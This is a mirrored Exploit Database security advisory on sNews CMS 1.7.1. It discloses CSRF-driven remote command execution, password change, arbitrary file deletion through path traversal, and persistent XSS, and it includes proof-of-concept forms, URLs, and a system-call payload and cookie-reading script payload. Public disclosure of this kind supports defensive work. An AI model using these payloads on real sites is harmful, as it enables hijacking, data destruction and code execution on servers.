sNews CMS 1.7.1 – Multiple Vulnerabilities

Exploit Database
120 阅读

作者： hyp3rlinx

日期： 2016-06-20
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/39976/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:

http://hyp3rlinx.altervista.org/advisories/SNEWS-RCE-CSRF-XSS.txt

[+] ISR: APPARITIONSEC

Vendor:

============

snewscms.com

Product:

================

sNews CMS v1.7.1

Vulnerability Type:

===================================

Persistent Remote Command Execution

Cross Site Request Forgeries (CSRF)

Persistent XSS

CVE Reference:

==============

N/A

Vulnerability Details:

======================

If an authenticated user happens to stumble upon an attackers webpage or

click an infected link they have a chance to get the following prizes,

1) Persistent Remote Code Execution

2) Cross Site Request Forgeries

3) Persistent XSS

sNews has feature that allows PHP functions to be inserted for articles by

authenticated users under "Edit Article". However, there is no

CSRF token/checks to prevent unauthorized HTTP requests to be made on

behalf of that user. Furthermore, these commands will get stored in MySQL

database in the 'articles' table. So each time that sNews webpage is

visited it will execute.

e.g.

CSRF / RCE Under "Edit Article" Admin area.

[func]system:|:"calc.exe"[/func]

On line no 3270 of "snews.php" there is no input filtering allowing

arbitrary system calls.

$returned = call_user_func_array($func[0], explode(',',$func[1]));

////////////////////////////////////////////////////////////////////////////////////////////

CSRF / Hijack SNews CMS accounts, the username however must be known in

advance, if known then that lucky user wins a changed password!.

////////////////////////////////////////////////////////////////////////////////////////////

CSRF / arbitrary file deletion, we can delete arbitrary files in the

webroot which we can use to bypass access controls like ".htaccess" file.

allowing attackers to read/access files from those affected directories.

On line 3080 "snews.php" direct usage of untrusted user input into the PHP

"unlink" function which deletes any files the attacker wants.

if (isset($_GET['task']) == 'delete') {

$file_to_delete = $_GET['folder'].'/'.$_GET['file'];

@unlink($file_to_delete);

echo notification(0,'','snews_files');

///////////////////////////////////////////////////////////////////////////////////////////

Persistent XSS entry point also exists in same "Edit Article" Admin area,

but why bother when we have RCE option.

Exploit code(s):

===============

Remote Command Execution pop "calc.exe" POC.

<form id="CSRF_RCE_PRIZE" method="post" action="

http://localhost/snews1.7.1/?action=process&task=admin_article&id=2">

</form>

After we make HTTP request for the booby trapped article and KABOOM.

http://localhost/snews1.7.1/uncategorized/remote-command-execution/

CSRF - Account Hijack

=====================

<form id="CSRF-CHG-PASSWD-PRIZE" method="post" action="

http://localhost/snews1.7.1/?action=process&task=changeup">

</form>

CSRF - Arbitrary File Deletion

===============================

1) Create file in htdocs / web root as a test e.g. "DELETEME.php"

2) Visit following URL as authenticated user.

http://localhost/snews1.7.1/?action=snews_files&task=delete&folder=Patches

Log&file=../../../DELETEME.php

3) Files gone!

Persistent XSS

===============

<form id="XSS" method="post" action="

http://localhost/snews1.7.1/?action=process&task=admin_article&id=2">

<input type="hidden" name="text"

value="[include]<script>alert(document.cookie)</script>[/include]" />

</form>

Disclosure Timeline:

=================================

Vendor Notification:No Replies

June 19, 2016: Public Disclosure

Exploitation Technique:

=======================

Remote

Severity Level:

================

Critical

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Description:

================================================

Request Method(s):[+]GET / POST

Vulnerable Product: [+] snews v1.7.1

===========================================

[+] Disclaimer

The information contained within this advisory is supplied "as-is" with no

warranties or guarantees of fitness of use or otherwise.

Permission is hereby granted for the redistribution of this advisory,

provided that it is not altered except by reformatting it, and

that due credit is given. Permission is explicitly given for insertion in

vulnerability databases and similar, provided that due credit

is given to the author. The author is not responsible for any misuse of the

information contained herein and accepts no responsibility

for any damage caused by the use or misuse of this information. The author

prohibits any malicious use of security related information

or exploits by the author or elsewhere.

by hyp3rlinx